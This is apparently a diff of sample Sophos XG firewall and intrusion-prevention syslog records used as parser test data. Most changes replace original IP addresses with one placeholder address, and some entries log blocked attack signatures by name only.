src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code="" dst_ip=172.20.4.52 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:40 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="Port1" src_mac="" src_ip=10.82.234.6 src_country_code="" dst_ip=192.168.0.1 dst_country_code="" protocol="TCP" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:44 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=012802605201 log_type="Firewall" log_component="SSL VPN" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="" src_mac="" src_ip=10.82.234.9 src_country_code="" dst_ip=10.82.234.11 dst_country_code="" protocol="TCP" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=172.17.32.19 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" -<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" +<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" <30>device="SFW" date=2018-06-04 time=17:20:24 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011402601301 log_type="Firewall" log_component="Fragmented Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol="0" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:01:32 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.611" out_interface="" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol="UDP" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:17:17 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol="TCP" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" <30>device="SFW" date=2018-06-05 time=14:30:31 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010502604001 log_type="Firewall" log_component="ICMP Redirection" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol="ICMP" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" -<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" +<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=15:09:51 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011702605051 log_type="Firewall" log_component="MAC Filter" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.531" out_interface="" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol="UDP" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-06-01 time=10:57:55 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600006 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" -<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 